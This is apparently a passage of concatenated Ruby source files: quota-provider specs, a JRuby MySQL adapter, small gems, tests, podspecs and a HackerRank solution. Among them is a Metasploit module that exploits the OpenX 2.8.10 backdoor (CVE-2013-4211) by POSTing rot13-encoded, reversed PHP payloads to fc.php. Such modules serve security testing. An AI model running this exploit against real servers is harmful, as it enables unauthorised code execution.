            resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '-')
            resource.provider.send("#{property}=", :absent)
          end

          it "should convert value to KB if desired value is numeric" do
            resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
            resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '102400')
            resource.provider.send("#{property}=", 104857600) # 100MB
          end
        end

        context "on a tree quota" do
          let(:parameters) do
            tree_quota_parameters
          end

          it "should pass \"\" as a qtree for tree quotas" do
            resource.provider.set(:name => '/vol/vol1/qtree1', :type => :tree, :volume => 'vol3')
            resource.provider.expects(:mod).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol3', 'qtree', '', apiproperty, '4')
            resource.provider.send("#{property}=", 4096)
          end
        end
      end
    end

    {
      :filelimit => 'file-limit',
      :softfilelimit => 'soft-file-limit'
    }.each do |property, apiproperty|
      describe property do
        context "on a user quota" do
          let(:parameters) do
            user_quota_parameters
          end

          it "should pass \"-\" parameters for #{apiproperty} if desired value is absent" do
            resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
            resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '-')
            resource.provider.send("#{property}=", :absent)
          end

          it "should pass the desired value if desired value is numeric" do
            resource.provider.set(:name => 'bob', :type => :user, :qtree => 'qtree01', :volume => 'vol01')
            resource.provider.expects(:mod).with('quota-target', 'bob', 'quota-type', 'user', 'volume', 'vol01', 'qtree', 'qtree01', apiproperty, '104857600')
            resource.provider.send("#{property}=", 104857600) # 100M
          end
        end

        context "on a tree quota" do
          let(:parameters) do
            tree_quota_parameters
          end

          it "should pass \"\" as a qtree for tree quotas" do
            resource.provider.set(:name => '/vol/vol1/qtree1', :type => :tree, :volume => 'vol3')
            resource.provider.expects(:mod).with('quota-target', '/vol/vol1/qtree1', 'quota-type', 'tree', 'volume', 'vol3', 'qtree', '', apiproperty, '4096')
            resource.provider.send("#{property}=", 4096)
          end
        end
      end
    end
  end

  describe "#flush" do
    let :quota_on do
      YAML.load_file(my_fixture('quota-status-result-on.yml'))
    end

    let :quota_off do
      YAML.load_file(my_fixture('quota-status-result-off.yml'))
    end

    describe "when a complete reload is not necessary" do
      it "should call resize if quota is activated for that volume" do
        provider.set(:volume => 'vol01')
        provider.expects(:status).with('volume', 'vol01').returns quota_on
        provider.expects(:resize).with('volume', 'vol01')
        provider.expects(:qoff).never
        provider.expects(:qon).never
        provider.flush
      end

      it "should do nothing if quota is deactivated for that volume" do
        provider.set(:volume => 'vol01')
        provider.expects(:status).with('volume', 'vol01').returns quota_off
        provider.expects(:resize).never
        provider.expects(:qoff).never
        provider.expects(:qon).never
        provider.flush
      end
    end

    describe "when a complete reload is necessary" do
      before :each do
        provider.instance_variable_set(:@need_restart, true)
      end

      it "should turn quota off and back on if quota is activated for that volume" do
        provider.set(:volume => 'vol01')
        provider.expects(:status).with('volume', 'vol01').returns quota_on
        provider.expects(:resize).never
        seq = sequence 'restart quota'
        provider.expects(:qoff).with('volume', 'vol01').in_sequence(seq)
        provider.expects(:qon).with('volume', 'vol01').in_sequence(seq)
        provider.flush
      end

      it "should do nothing if quota is deactivated for that volume" do
        provider.set(:volume => 'vol01')
        provider.expects(:status).with('volume', 'vol01').returns quota_off
        provider.expects(:resize).never
        provider.expects(:qoff).never
        provider.expects(:qon).never
        provider.flush
      end
    end
  end
end
| 34.530043 | 164 | 0.563358 |
010152669a2116279a601231663a32cb482b2c5d | 216 | module TZInfo
module Definitions
module America
module Anguilla
include TimezoneDefinition
linked_timezone 'America/Anguilla', 'America/Port_of_Spain'
end
end
end
end
| 18 | 67 | 0.662037 |
18ebd218c698b5418f04b17c72513a245990614d | 166 | # frozen_string_literal: true
require "tpm/key_attestation"
# Monkeypatch: replace the tpm gem's VENDOR_IDS table with a single entry
# mapping the FIDO Alliance's reserved vendor id. remove_const is used first
# to avoid the "already initialized constant" warning on reassignment.
# NOTE(review): presumably test support for attestation fixtures signed with
# the FIDO Alliance id — confirm against the callers.
::TPM.send(:remove_const, "VENDOR_IDS")
::TPM::VENDOR_IDS = { "id:FFFFF1D0" => "FIDO Alliance" }.freeze
| 23.714286 | 63 | 0.722892 |
f7a022ce032628499473ec51baec5ace8757f139 | 40 | module MusicIds
VERSION = "0.4.0"
end
| 10 | 19 | 0.675 |
4a373c7c3dabf5f160bc6e5ff7b44150ffc0ac96 | 102 | module OpenGraphImage
class Engine < ::Rails::Engine
isolate_namespace OpenGraphImage
end
end
| 17 | 36 | 0.77451 |
ed4daa96e79724dfffa340061afe016d54336ded | 402 | =begin
see problem here: https://www.hackerrank.com/challenges/chocolate-feast
=end
#!/bin/ruby
# HackerRank "Chocolate Feast": for each test case, n is the money available,
# c the cost per bar and m the number of wrappers exchangeable for one free
# bar. Read t test cases from stdin and print the total bars eaten per case.
t = gets.strip.to_i
for a0 in (0..t-1)
  n,c,m = gets.strip.split(' ')
  n = n.to_i
  c = c.to_i
  m = m.to_i
  # Initial purchase: n/c bars, each leaving one wrapper.
  wrappers=toffees=n/c
  # Keep trading wrappers for free bars while enough wrappers remain;
  # each free bar also yields a wrapper (wrappers % m carries the remainder).
  while wrappers>=m
    free_toffees = wrappers/m
    toffees+=free_toffees
    wrappers=free_toffees+(wrappers%m)
  end
  puts toffees
end | 20.1 | 71 | 0.621891 |
91322a9c9ece0ba43127f8a9628b987608ed78ce | 5,537 | # frozen_string_literal: true
ArJdbc.load_java_part :MySQL
require 'bigdecimal'
require 'active_record/connection_adapters/abstract_mysql_adapter'
require 'active_record/connection_adapters/abstract/schema_definitions'
require 'arjdbc/abstract/core'
require 'arjdbc/abstract/connection_management'
require 'arjdbc/abstract/database_statements'
require 'arjdbc/abstract/statement_cache'
require 'arjdbc/abstract/transaction_support'
module ActiveRecord
  module ConnectionAdapters
    AbstractMysqlAdapter.class_eval do
      include ArJdbc::Abstract::Core # to have correct initialize() super
    end
    # Remove any vestiges of core/Ruby MySQL adapter
    remove_const(:Mysql2Adapter) if const_defined?(:Mysql2Adapter)
    # JRuby/JDBC replacement for the MRI mysql2 adapter: keeps the Mysql2
    # adapter name and public surface while backing all connection handling,
    # statements and transactions with the ArJdbc JDBC abstractions.
    class Mysql2Adapter < AbstractMysqlAdapter
      ADAPTER_NAME = 'Mysql2'
      include Jdbc::ConnectionPoolCallbacks
      include ArJdbc::Abstract::ConnectionManagement
      include ArJdbc::Abstract::DatabaseStatements
      # NOTE: do not include MySQL::DatabaseStatements
      include ArJdbc::Abstract::StatementCache
      include ArJdbc::Abstract::TransactionSupport
      include ArJdbc::MySQL
      # Prepared statements default to off unless the config enables them.
      def initialize(connection, logger, connection_options, config)
        superclass_config = config.reverse_merge(prepared_statements: false)
        super(connection, logger, connection_options, superclass_config)
        # configure_connection taken care of at ArJdbc::Abstract::Core
      end
      # True when a connection to the configured database can be opened and
      # validated; always disconnects the probe connection afterwards.
      def self.database_exists?(config)
        conn = ActiveRecord::Base.mysql2_connection(config)
        conn && conn.really_valid?
      rescue ActiveRecord::NoDatabaseError
        false
      ensure
        conn.disconnect! if conn
      end
      def check_version
        # for JNDI, don't check version as the whole connection should be lazy
        return if ::ActiveRecord::ConnectionAdapters::JdbcConnection.jndi_config?(config)
        super
      end
      # JSON columns arrived in MySQL 5.7.8; MariaDB's JSON support differs,
      # hence the explicit exclusion.
      def supports_json?
        !mariadb? && database_version >= '5.7.8'
      end
      def supports_comments?
        true
      end
      def supports_comments_in_create?
        true
      end
      def supports_savepoints?
        true
      end
      def supports_lazy_transactions?
        true
      end
      def supports_transaction_isolation?
        true
      end
      def supports_set_server_option?
        false
      end
      # HELPER METHODS ===========================================
      # from MySQL::DatabaseStatements
      READ_QUERY = ActiveRecord::ConnectionAdapters::AbstractAdapter.build_read_query_regexp(
        :desc, :describe, :set, :show, :use
      ) # :nodoc:
      private_constant :READ_QUERY
      def write_query?(sql) # :nodoc:
        !READ_QUERY.match?(sql)
      end
      # Runs EXPLAIN for the given Arel/binds and pretty-prints the result
      # together with the measured wall time.
      def explain(arel, binds = [])
        sql = "EXPLAIN #{to_sql(arel, binds)}"
        start = Concurrent.monotonic_time
        result = exec_query(sql, "EXPLAIN", binds)
        elapsed = Concurrent.monotonic_time - start
        MySQL::ExplainPrettyPrinter.new.pp(result, elapsed)
      end
      # Reloading the type map in abstract/statement_cache.rb blows up postgres
      def clear_cache!
        reload_type_map
        super
      end
      # Yields each result row as a symbol-keyed hash (mysql2 API shim); with
      # no block, returns an Enumerator over the same conversion.
      def each_hash(result) # :nodoc:
        if block_given?
          # FIXME: This is C in mysql2 gem and I just made simplest Ruby
          result.each do |row|
            new_hash = {}
            row.each { |k, v| new_hash[k.to_sym] = v }
            yield new_hash
          end
        else
          to_enum(:each_hash, result)
        end
      end
      def error_number(exception)
        exception.error_code if exception.is_a?(JDBCError)
      end
      #--
      # QUOTING ==================================================
      #+
      # FIXME: 5.1 crashes without this. I think this is Arel hitting a fallback path in to_sql.rb.
      # So maybe an untested code path in their source. Still means we are doing something wrong to
      # even hit it.
      def quote(value, comment=nil)
        super(value)
      end
      # NOTE: quote_string(string) provided by ArJdbc::MySQL (native code),
      # this piece is also native (mysql2) under MRI: `@connection.escape(string)`
      # Strips sub-second precision when the server cannot store it.
      def quoted_date(value)
        if supports_datetime_with_precision?
          super
        else
          super.sub(/\.\d{6}\z/, '')
        end
      end
      # Binary data is emitted as a hex literal (x'...').
      def _quote(value)
        if value.is_a?(Type::Binary::Data)
          "x'#{value.hex}'"
        else
          super
        end
      end
      private :_quote
      #--
      # CONNECTION MANAGEMENT ====================================
      #++
      alias :reset! :reconnect!
      #
      private
      # e.g. "5.7.20-0ubuntu0.16.04.1"
      def full_version
        schema_cache.database_version.full_version_string
      end
      def get_full_version
        @full_version ||= @connection.full_version
      end
      def jdbc_connection_class(spec)
        ::ActiveRecord::ConnectionAdapters::MySQLJdbcConnection
      end
      def jdbc_column_class
        ::ActiveRecord::ConnectionAdapters::MySQL::Column
      end
      # defined in MySQL::DatabaseStatements which is not included
      def default_insert_value(column)
        super unless column.auto_increment?
      end
      # FIXME: optimize insert_fixtures_set by using JDBC Statement.addBatch()/executeBatch()
      def combine_multi_statements(total_sql)
        if total_sql.length == 1
          total_sql.first
        else
          total_sql
        end
      end
    end
  end
end
| 26.878641 | 100 | 0.631931 |
62667b859f0e9652aabd46a849cf1b7691186a3e | 3,026 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenX Backdoor PHP Code Execution',
'Description' => %q{
OpenX Ad Server version 2.8.10 was shipped with an obfuscated
backdoor since at least November 2012 through August 2013.
Exploitation is simple, requiring only a single request with a
rot13'd and reversed payload.
},
'Author' =>
[
'egypt', # Metasploit module, shouts to bperry for hooking me up with the vuln software
'Unknown', # Someone planted this backdoor...
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2013-4211' ],
[ 'OSVDB', '96073' ],
[ 'URL', 'http://www.heise.de/security/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html'],
[ 'URL', 'http://forum.openx.org/index.php?showtopic=503521628'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'DisclosureDate' => 'Aug 07 2013',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Generic (PHP payload)', { }]],
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [true, "The URI to request", "/openx/"]),
], self.class)
end
def check
token = rand_text_alpha(20)
response = execute_php("echo '#{token} '.phpversion();die();")
if response.nil?
CheckCode::Unknown
elsif response.body =~ /#{token} ((:?\d\.?)+)/
vprint_status("PHP Version #{$1}")
return CheckCode::Vulnerable
end
return CheckCode::Safe
end
def exploit
execute_php(payload.encoded)
handler
end
def execute_php(php_code)
money = rot13(php_code.reverse)
begin
response = send_request_cgi( {
'method' => "POST",
'global' => true,
'uri' => normalize_uri(target_uri.path,"www","delivery","fc.php"),
'vars_get' => {
'file_to_serve' => "flowplayer/3.1.1/flowplayer-3.1.1.min.js",
'script' => 'deliveryLog:vastServeVideoPlayer:player'
},
'vars_post' => {
'vastPlayer' => money
},
}, 0.1)
rescue ::Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue ::OpenSSL::SSL::SSLError
fail_with(Failure::BadConfig, "The target failed to negotiate SSL, is this really an SSL service?")
end
response
end
def rot13(str)
str.tr! "A-Za-z", "N-ZA-Mn-za-m"
end
end
| 29.960396 | 127 | 0.576338 |
330b6e427ca667549db42081a216d2fa6f208c02 | 1,828 | #
# Be sure to run `pod lib lint MDMultiSourceDemo.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
  s.name = 'MDMultiSourceDemo_C'
  # Derives the pod version from the latest reachable git tag, falling back
  # to "0.0.1" when `git describe` fails (no tags / not a git checkout).
  def self.smart_version
    tag = `git describe --abbrev=0 --tags 2>/dev/null`.strip
    if $?.success? then tag else "0.0.1" end
  end
  s.version = smart_version
  s.summary = 'A short description of MDMultiSourceDemo_A.'
  # This description is used to generate tags and improve search results.
  # * Think: What does it do? Why did you write it? What is the focus?
  # * Try to keep it short, snappy and to the point.
  # * Write the description between the DESC delimiters below.
  # * Finally, don't worry about the indent, CocoaPods strips it!
  s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
  s.homepage = 'https://github.com/Leon0206/MDMultiSourceDemo'
  # s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
  s.license = { :type => 'MIT', :file => 'LICENSE' }
  s.author = { 'Leon0206' => '[email protected]' }
  s.source = { :git => 'https://github.com/Leon0206/MDMultiSourceDemo.git', :tag => s.version.to_s }
  # s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
  s.ios.deployment_target = '9.0'
  # Only the _C sub-pod's sources are shipped by this spec.
  s.source_files = [
    'MDMultiSourceDemo/Classes/MDMultiSourceDemo_C/**/*',
  ]
  # s.resource_bundles = {
  #   'MDMultiSourceDemo' => ['MDMultiSourceDemo/Assets/*.png']
  # }
  # s.public_header_files = 'Pod/Classes/**/*.h'
  # s.frameworks = 'UIKit', 'MapKit'
  s.dependency 'MDMultiSourceDemo_Core'
end
| 37.306122 | 110 | 0.654814 |
6a123aad1d151487777bb7392c1a75f5eae61af8 | 2,002 | require "factory_bot"
require "mockley_crew/engine"
require "mockley_crew/configuration"
require "mockley_crew/errors/connection_not_made"
require "mockley_crew/errors/database_not_found"
require "mockley_crew/errors/database_with_no_name"
require "mockley_crew/errors/invalid_data"
require "mockley_crew/errors/invalid_factory"
require "mockley_crew/errors/invalid_amount"
require "mockley_crew/database"
require "mockley_crew/factory_builder"
require "mockley_crew/data"
require "mockley_crew/mockley_crew_handled"
# Gem entry point: global configuration plus Heroku-specific plumbing that
# forces a vendored sqlite3 into the load path and loads ActiveRecord's
# sqlite3 adapter despite its `gem "sqlite3"` version pin.
module MockleyCrew
  class << self
    attr_writer :configuration
  end
  # Lazily-built singleton configuration.
  def self.configuration
    @configuration ||= Configuration.new
  end
  def self.reset_configuration
    @configuration = Configuration.new
  end
  # Standard configure-with-block entry point; on Heroku additionally wires
  # up the vendored sqlite3 (see set_sqlite3).
  def self.configure
    yield(configuration)
    if configuration.heroku?
      set_sqlite3
    end
  end
  # Adds the vendored sqlite3 gem to $LOAD_PATH and requires it, then works
  # around ActiveRecord's adapter gem check. No-op when SQLite3 is already
  # loaded. NOTE(review): the sqlite3 version/path is hard-coded.
  def self.set_sqlite3
    return if defined?(SQLite3)
    $: << "#{Rails.root}/vendor/gems/sqlite3/gems/sqlite3-1.3.13/lib/"
    require 'sqlite3'
    hack_active_record
  end
  # Temporarily rewrites the *installed* ActiveRecord sqlite3_adapter.rb on
  # disk to strip its `gem "sqlite3"` pin, requires it, then restores the
  # original file contents. NOTE(review): this mutates a gem file on disk
  # and is not safe if the process dies between the two writes.
  def self.hack_active_record
    file_path = active_record_path + "/active_record/connection_adapters/sqlite3_adapter.rb"
    file_contents = File.read(file_path)
    new_contents = file_contents.gsub(/gem \"sqlite3\".*$/, "")
    write_to_file(file_path, new_contents)
    require 'active_record/connection_adapters/sqlite3_adapter'
    write_to_file(file_path, file_contents)
  end
  def self.load_active_record_sqlite3_adapter
    require 'active_record/connection_adapters/sqlite3_adapter'
  end
  # Locates the installed active_record lib directory by shelling out to
  # `gem which` and dropping the trailing file name.
  def self.active_record_path
    (`gem which active_record`).split("/")[0..-2].join("/")
  end
  def self.write_to_file file, contents
    File.open(file, "w+") do |f|
      f.write(contents)
    end
  end
  # Gem root directory (two levels up from this file).
  def self.root
    File.expand_path '../..', __FILE__
  end
  # True when the current AR connection's database file lives inside the
  # configured database_files_path (trailing slash normalized away).
  def self.activated?
    ActiveRecord::Base.connection.instance_variable_get(:@config)[:database].split("/")[0..-2].join("/") == configuration.database_files_path.gsub(/\/$/, "")
  end
end
| 25.666667 | 157 | 0.744256 |
ab111cb81de7b327eb471f4a9c000fc26e0d5a9e | 12,597 | require_relative "../../test_helper"
module SmartAnswer
module Calculators
class MarriageAbroadDataQueryTest < ActiveSupport::TestCase
context MarriageAbroadDataQuery do
setup do
@data_query = MarriageAbroadDataQuery.new
end
context "#marriage_data" do
should "load data from yaml file only once" do
YAML.stubs(:load_file).returns({})
YAML.expects(:load_file).once.returns({})
@data_query.marriage_data
@data_query.marriage_data
end
should "load data from correct path leading to marriage_abroad_data.yml" do
path = Rails.root.join("lib/data/marriage_abroad_data.yml")
YAML.stubs(:load_file).returns({})
YAML.expects(:load_file).with(path).returns({})
@data_query.marriage_data
end
should "only contain pre-defined data keys" do
keys = %w(countries_with_18_outcomes countries_with_2_outcomes countries_with_2_outcomes_marriage_or_pacs countries_with_6_outcomes countries_with_ceremony_location_outcomes countries_with_1_outcome)
data = @data_query.marriage_data
assert_equal keys, data.keys
end
end
context "#countries_with_18_outcomes" do
should "returns countries that are listed to have 18 outcomes" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: %w(anguilla bermuda))
assert_equal %w(anguilla bermuda), @data_query.countries_with_18_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: nil)
assert_equal [], @data_query.countries_with_18_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_18_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_18_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_18_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_18_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_18_outcomes\""
end
end
context "#countries_with_2_outcomes" do
should "returns countries that are listed to have 2 outcomes" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: %w(aruba bonaire-st-eustatius-saba))
assert_equal %w(aruba bonaire-st-eustatius-saba), @data_query.countries_with_2_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: nil)
assert_equal [], @data_query.countries_with_2_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_2_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_2_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_2_outcomes\""
end
end
context "#countries_with_2_outcomes_marriage_or_pacs" do
should "returns countries that are listed to have 2 marriage or pacs outcomes" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: %w(monaco wallis-and-futuna new-caledonia))
assert_equal %w(monaco wallis-and-futuna new-caledonia), @data_query.countries_with_2_outcomes_marriage_or_pacs
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: nil)
assert_equal [], @data_query.countries_with_2_outcomes_marriage_or_pacs
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes_marriage_or_pacs
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes_marriage_or_pacs
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_2_outcomes_marriage_or_pacs is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_2_outcomes_marriage_or_pacs
end
assert_equal exception.message, "key not found: \"countries_with_2_outcomes_marriage_or_pacs\""
end
end
context "#countries_with_6_outcomes" do
should "returns countries that are listed to have 6 outcomes" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: %w(argentina brazil))
assert_equal %w(argentina brazil), @data_query.countries_with_6_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: nil)
assert_equal [], @data_query.countries_with_6_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_6_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_6_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_6_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_6_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_6_outcomes\""
end
end
context "#countries_with_ceremony_location_outcomes" do
should "returns countries that are listed to have ceremony location outcomes" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: %w(finland))
assert_equal %w(finland), @data_query.countries_with_ceremony_location_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: nil)
assert_equal [], @data_query.countries_with_ceremony_location_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_ceremony_location_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_ceremony_location_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_ceremony_location_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_ceremony_location_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_ceremony_location_outcomes\""
end
end
context "#countries_with_1_outcome" do
should "returns countries that are listed to have 1 outcomes" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: %w(monaco new-caledonia))
assert_equal %w(monaco new-caledonia), @data_query.countries_with_1_outcome
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: nil)
assert_equal [], @data_query.countries_with_1_outcome
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_1_outcome
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_1_outcome
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_1_outcome is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_1_outcome
end
assert_equal exception.message, "key not found: \"countries_with_1_outcome\""
end
end
context "#outcome_per_path_countries" do
should "return an alphabetical list of countries under all outcome groups" do
YAML.stubs(:load_file).returns(
countries_with_18_outcomes: %w(anguilla),
countries_with_6_outcomes: %w(bermuda),
countries_with_2_outcomes: %w(cayman-islands),
countries_with_2_outcomes_marriage_or_pacs: %w(monaco),
countries_with_ceremony_location_outcomes: %w(finland),
countries_with_1_outcome: %w(french-guiana),
)
assert_equal @data_query.outcome_per_path_countries,
%w(anguilla bermuda cayman-islands finland french-guiana monaco)
end
end
end
end
end
end
| 39.365625 | 211 | 0.65976 |
d5164087354fc3ed605ea70fb4b3072abe15914a | 374 | # frozen_string_literal: true
module MongoQL
class Expression::Macro < Expression
attr_accessor :name
def initialize(name)
validate!(name)
@name = name
end
def validate!(name)
raise ArgumentError, "macro #{name} is not registered!" unless MongoQL::Macro.has_macro?(name)
end
def to_ast
"$macro_#{name}"
end
end
end | 18.7 | 100 | 0.652406 |
28a66327ac5eda33e7ac233fa93e07433a600824 | 68 | module Text_Displayer
def display_text text_to_display
end
end
| 11.333333 | 34 | 0.823529 |
01163d6cf2f9793400593024e959d97479f7cee7 | 430 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
  # Every static page should simply render with a success status; the four
  # cases differ only in the named route used, so generate one test per page
  # (test names stay identical to the hand-written originals).
  [
    ["home", :root_path],
    ["help", :help_path],
    ["about", :about_path],
    ["contact", :contact_path],
  ].each do |page_name, route_helper|
    test "should get #{page_name}" do
      get public_send(route_helper)
      assert_response :success
    end
  end
end
| 16.538462 | 65 | 0.725581 |
b93b520a79092067fe94d2f5d9edf64a55c9a417 | 425 | # frozen_string_literal: true
# Hash-backed record used as the object_class for JSON.parse, with a
# class-level cache of the last loaded collection.
class Item
  include Searchable
  extend Forwardable

  # Hash-like behavior is delegated straight to the wrapped hash.
  def_delegators :@item, :[]=, :each, :detect

  @collection = []

  def initialize(item = {})
    @item = item
  end

  # Parses the JSON file at +source+ into Item instances, caches them on the
  # class, and returns the class so .filtered_by can be chained.
  def self.from(source)
    parsed = JSON.parse(File.read(source), object_class: Item)
    @collection = Array(parsed)
    self
  end

  # Filters the cached collection via Searchable's filter_collection.
  def self.filtered_by(criteria)
    filter_collection(@collection, criteria)
  end
end
| 17 | 61 | 0.68 |
ab7bcfc0240c1f6b03556a76d178762fafc779e3 | 1,201 | # frozen_string_literal: true
module ThemeCheck
# Reports missing content_for_header and content_for_layout in theme.liquid
class RequiredLayoutThemeObject < LiquidCheck
severity :error
category :liquid
doc docs_url(__FILE__)
LAYOUT_FILENAME = "layout/theme"
def initialize
@content_for_layout_found = false
@content_for_header_found = false
end
def on_document(node)
@layout_theme_node = node if node.theme_file.name == LAYOUT_FILENAME
end
def on_variable(node)
return unless node.value.name.is_a?(Liquid::VariableLookup)
@content_for_header_found ||= node.value.name.name == "content_for_header"
@content_for_layout_found ||= node.value.name.name == "content_for_layout"
end
def after_document(node)
return unless node.theme_file.name == LAYOUT_FILENAME
add_missing_object_offense("content_for_layout") unless @content_for_layout_found
add_missing_object_offense("content_for_header") unless @content_for_header_found
end
private
def add_missing_object_offense(name)
add_offense("#{LAYOUT_FILENAME} must include {{#{name}}}", node: @layout_theme_node)
end
end
end
| 29.292683 | 90 | 0.738551 |
b9d53f6938083ca7c3c841378b1e070d9538db82 | 359 | require 'formula'
# Homebrew formula for fb-client, the CLI uploader for paste.xinu.at.
class FbClient < Formula
  homepage 'https://paste.xinu.at'
  url 'https://paste.xinu.at/data/client/fb-1.1.4.tar.gz'
  sha1 '03483b5cdda9d27121941ddd10ffd20967f3f63b'
  # Both formulas install an `fb` executable, so they cannot coexist.
  conflicts_with 'findbugs',
    :because => "findbugs and fb-client both install a `fb` binary"
  def install
    system "make", "PREFIX=#{prefix}", "install"
  end
end
| 23.933333 | 67 | 0.707521 |
629429c874c941610b580e911d9aab4ead04fa27 | 767 | Pod::Spec.new do |s|
s.name = 'PusherSwift'
s.version = '7.2.0'
s.summary = 'A Pusher client library in Swift'
s.homepage = 'https://github.com/pusher/pusher-websocket-swift'
s.license = 'MIT'
s.author = { "Hamilton Chapman" => "[email protected]" }
s.source = { git: "https://github.com/pusher/pusher-websocket-swift.git", tag: s.version.to_s }
s.social_media_url = 'https://twitter.com/pusher'
s.swift_version = '4.2'
s.requires_arc = true
s.source_files = 'Sources/*.swift'
s.dependency 'ReachabilitySwift', '4.3.0'
